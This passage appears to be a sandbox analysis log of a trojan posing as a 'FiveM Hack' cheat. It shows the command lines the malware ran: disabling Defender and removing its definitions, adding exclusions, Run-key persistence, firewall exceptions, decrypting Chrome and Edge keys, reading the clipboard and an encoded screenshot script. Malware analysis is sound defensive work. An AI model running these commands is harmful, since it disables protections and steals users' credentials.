memory of 4428 2736 Windows Services.exe 107 PID 1464 wrote to memory of 1732 1464 Setup.exe 109 PID 1464 wrote to memory of 1732 1464 Setup.exe 109 PID 1464 wrote to memory of 1732 1464 Setup.exe 109 PID 4896 wrote to memory of 3120 4896 FiveM Hack V1.exe 110 PID 4896 wrote to memory of 3120 4896 FiveM Hack V1.exe 110 PID 3120 wrote to memory of 3476 3120 Rename_Z60IHLDjO6.exe 112 PID 3120 wrote to memory of 3476 3120 Rename_Z60IHLDjO6.exe 112 PID 3476 wrote to memory of 5016 3476 cmd.exe 113 PID 3476 wrote to memory of 5016 3476 cmd.exe 113 PID 5016 wrote to memory of 1276 5016 powershell.exe 114 PID 5016 wrote to memory of 1276 5016 powershell.exe 114 PID 1276 wrote to memory of 1500 1276 csc.exe 115 PID 1276 wrote to memory of 1500 1276 csc.exe 115 PID 3120 wrote to memory of 2240 3120 Rename_Z60IHLDjO6.exe 116 PID 3120 wrote to memory of 2240 3120 Rename_Z60IHLDjO6.exe 116 PID 2240 wrote to memory of 1068 2240 cmd.exe 117 PID 2240 wrote to memory of 1068 2240 cmd.exe 117 PID 3120 wrote to memory of 4484 3120 Rename_Z60IHLDjO6.exe 119 PID 3120 wrote to memory of 4484 3120 Rename_Z60IHLDjO6.exe 119 PID 3120 wrote to memory of 5060 3120 Rename_Z60IHLDjO6.exe 120 PID 3120 wrote to memory of 5060 3120 Rename_Z60IHLDjO6.exe 120 PID 4484 wrote to memory of 3360 4484 cmd.exe 121 PID 4484 wrote to memory of 3360 4484 cmd.exe 121 PID 5060 wrote to memory of 1692 5060 cmd.exe 122 PID 5060 wrote to memory of 1692 5060 cmd.exe 122 PID 3120 wrote to memory of 264 3120 Rename_Z60IHLDjO6.exe 123 PID 3120 wrote to memory of 264 3120 Rename_Z60IHLDjO6.exe 123 PID 264 wrote to memory of 4688 264 cmd.exe 154 PID 264 wrote to memory of 4688 264 cmd.exe 154 PID 3120 wrote to memory of 2884 3120 Rename_Z60IHLDjO6.exe 184 PID 3120 wrote to memory of 2884 3120 Rename_Z60IHLDjO6.exe 184 PID 3120 wrote to memory of 5080 3120 Rename_Z60IHLDjO6.exe 126 PID 3120 wrote to memory of 5080 3120 Rename_Z60IHLDjO6.exe 126 PID 3120 wrote to memory of 3828 3120 Rename_Z60IHLDjO6.exe 127 PID 3120 wrote to memory of 3828 3120 Rename_Z60IHLDjO6.exe 127 PID 3828 wrote to memory of 4424 3828 cmd.exe 128 PID 3828 wrote to memory of 4424 3828 cmd.exe 128 PID 2884 wrote to memory of 4740 2884 cmd.exe 129 PID 2884 wrote to memory of 4740 2884 cmd.exe 129 PID 5080 wrote to memory of 1464 5080 cmd.exe 130 PID 5080 wrote to memory of 1464 5080 cmd.exe 130 PID 3120 wrote to memory of 1616 3120 Rename_Z60IHLDjO6.exe 131 PID 3120 wrote to memory of 1616 3120 Rename_Z60IHLDjO6.exe 131 PID 1616 wrote to memory of 4420 1616 cmd.exe 132
Processes
-
C:\Users\Admin\AppData\Local\Temp\FiveMHackV2.exe"C:\Users\Admin\AppData\Local\Temp\FiveMHackV2.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM Hack V1.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\FiveM Hack V1.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4896 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\CheatEngine75.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\CheatEngine75.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Users\Admin\AppData\Local\Temp\is-6467M.tmp\CheatEngine75.tmp"C:\Users\Admin\AppData\Local\Temp\is-6467M.tmp\CheatEngine75.tmp" /SL5="$7003A,2335682,780800,C:\Users\Admin\AppData\Local\Temp\RarSFX1\CheatEngine75.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:2728
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Client.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Client.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4344 -
C:\Users\Admin\AppData\Local\Temp\Windows Services.exe"C:\Users\Admin\AppData\Local\Temp\Windows Services.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Windows Services.exe" "Windows Services.exe" ENABLE5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4428
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Users\Admin\AppData\Roaming\Windows Defender.exe"C:\Users\Admin\AppData\Roaming\Windows Defender.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:1732 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Windows Defender.exe" "Windows Defender.exe" ENABLE5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2480
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Rename_Z60IHLDjO6.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Rename_Z60IHLDjO6.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3120 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\mBCF20ZX6v.ps1""4⤵
- Suspicious use of WriteProcessMemory
PID:3476 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\mBCF20ZX6v.ps1"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5016 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4tepkhkt\4tepkhkt.cmdline"6⤵
- Suspicious use of WriteProcessMemory
PID:1276 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3D62.tmp" "c:\Users\Admin\AppData\Local\Temp\4tepkhkt\CSC748D601EA1A44F059A7F9C879B673324.TMP"7⤵PID:1500
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"4⤵
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1068
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"4⤵
- Suspicious use of WriteProcessMemory
PID:4484 -
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,19,219,235,116,246,149,80,69,157,35,43,54,147,195,120,202,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,102,177,26,43,73,185,195,101,239,243,122,245,189,107,81,67,109,36,10,245,44,7,143,160,99,50,199,20,232,248,239,112,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,81,53,127,36,12,255,68,164,74,21,40,19,231,93,77,7,67,211,67,189,8,25,249,240,180,190,135,68,159,235,108,231,48,0,0,0,110,12,170,120,60,160,102,44,248,179,89,135,191,252,92,211,41,133,68,81,119,82,12,222,65,14,237,166,37,195,106,134,14,140,4,194,106,12,97,164,25,42,143,201,126,254,170,111,64,0,0,0,0,143,165,211,0,232,0,127,166,172,145,237,17,3,253,181,202,253,158,162,85,109,8,12,163,172,115,228,110,209,42,1,142,44,117,188,9,160,177,187,41,146,67,152,183,219,241,243,246,109,118,178,216,53,81,14,251,202,53,212,44,16,33,178), $null, 'CurrentUser')"4⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:5060 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,19,219,235,116,246,149,80,69,157,35,43,54,147,195,120,202,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,102,177,26,43,73,185,195,101,239,243,122,245,189,107,81,67,109,36,10,245,44,7,143,160,99,50,199,20,232,248,239,112,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,81,53,127,36,12,255,68,164,74,21,40,19,231,93,77,7,67,211,67,189,8,25,249,240,180,190,135,68,159,235,108,231,48,0,0,0,110,12,170,120,60,160,102,44,248,179,89,135,191,252,92,211,41,133,68,81,119,82,12,222,65,14,237,166,37,195,106,134,14,140,4,194,106,12,97,164,25,42,143,201,126,254,170,111,64,0,0,0,0,143,165,211,0,232,0,127,166,172,145,237,17,3,253,181,202,253,158,162,85,109,8,12,163,172,115,228,110,209,42,1,142,44,117,188,9,160,177,187,41,146,67,152,183,219,241,243,246,109,118,178,216,53,81,14,251,202,53,212,44,16,33,178), $null, 'CurrentUser')5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1692
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,19,219,235,116,246,149,80,69,157,35,43,54,147,195,120,202,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,39,19,78,149,121,181,167,81,239,194,103,77,198,156,120,120,247,244,202,176,184,17,85,78,59,29,198,219,203,238,206,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,248,92,249,62,65,149,47,110,21,60,135,79,23,18,163,12,246,10,137,162,169,189,202,100,39,223,20,63,21,24,161,172,48,0,0,0,249,173,150,250,152,87,128,153,68,12,45,90,198,220,55,13,229,172,194,125,99,137,154,246,125,111,102,149,130,197,190,75,97,25,48,229,182,44,61,253,104,51,16,85,226,74,180,64,64,0,0,0,89,143,140,204,74,133,97,128,122,74,214,182,127,253,212,206,252,236,41,180,158,50,83,61,13,166,174,194,98,210,159,38,136,5,230,100,124,36,185,112,221,96,155,39,22,224,93,103,110,214,106,123,88,204,153,62,232,35,54,206,75,247,4,34), $null, 'CurrentUser')"4⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:264 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,19,219,235,116,246,149,80,69,157,35,43,54,147,195,120,202,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,39,19,78,149,121,181,167,81,239,194,103,77,198,156,120,120,247,244,202,176,184,17,85,78,59,29,198,219,203,238,206,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,248,92,249,62,65,149,47,110,21,60,135,79,23,18,163,12,246,10,137,162,169,189,202,100,39,223,20,63,21,24,161,172,48,0,0,0,249,173,150,250,152,87,128,153,68,12,45,90,198,220,55,13,229,172,194,125,99,137,154,246,125,111,102,149,130,197,190,75,97,25,48,229,182,44,61,253,104,51,16,85,226,74,180,64,64,0,0,0,89,143,140,204,74,133,97,128,122,74,214,182,127,253,212,206,252,236,41,180,158,50,83,61,13,166,174,194,98,210,159,38,136,5,230,100,124,36,185,112,221,96,155,39,22,224,93,103,110,214,106,123,88,204,153,62,232,35,54,206,75,247,4,34), $null, 'CurrentUser')5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"4⤵
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\System32\Wbem\WMIC.exewmic diskdrive get serialnumber5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Rename_Z60IHLDjO6 /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"4⤵
- Suspicious use of WriteProcessMemory
PID:5080 -
C:\Windows\system32\reg.exereg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Rename_Z60IHLDjO6 /t REG_SZ /d "C:\ProgramData\Update.vbs" /f5⤵
- Adds Run key to start application
PID:1464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.V1q8q6VJev""4⤵
- Suspicious use of WriteProcessMemory
PID:3828 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.V1q8q6VJev"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""4⤵
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4420
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"4⤵PID:3508
-
C:\Windows\System32\Wbem\WMIC.exewmic baseboard get serialnumber5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "pip install pillow"4⤵PID:2188
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"4⤵PID:4444
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_computersystemproduct get uuid5⤵PID:1020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"4⤵PID:1232
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Description,PNPDeviceID5⤵PID:4876
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"4⤵PID:1228
-
C:\Windows\System32\Wbem\WMIC.exewmic memorychip get serialnumber5⤵PID:1804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"4⤵PID:1380
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:5020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"4⤵PID:4696
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get processorid5⤵PID:1992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "getmac /NH"4⤵PID:4344
-
C:\Windows\system32\getmac.exegetmac /NH5⤵PID:2396
-
-
-
C:\Users\Admin\AppData\Local\Temp\python-installer.exeC:\Users\Admin\AppData\Local\Temp\python-installer.exe /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=04⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4796 -
C:\Windows\Temp\{32C95C07-5F83-47D8-8FD8-FF8B611E686E}\.cr\python-installer.exe"C:\Windows\Temp\{32C95C07-5F83-47D8-8FD8-FF8B611E686E}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\python-installer.exe" -burn.filehandle.attached=560 -burn.filehandle.self=568 /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=05⤵
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "pip install pyperclip"4⤵PID:572
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\FiveM Hack.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\FiveM Hack.exe"3⤵
- Executes dropped EXE
PID:2908 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\FiveM Hack.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\FiveM Hack.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2332 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX1\FiveM Hack.exe'"5⤵PID:528
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX1\FiveM Hack.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2772
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"5⤵PID:1380
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4836
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:3956
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:4356
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:2352
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:1836
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"5⤵PID:244
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName6⤵PID:1644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"5⤵
- Clipboard Data
PID:4908 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard6⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:3540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:1140
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:4168
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:1988
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:2204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"5⤵PID:2884
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
PID:4796
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="5⤵PID:812
-
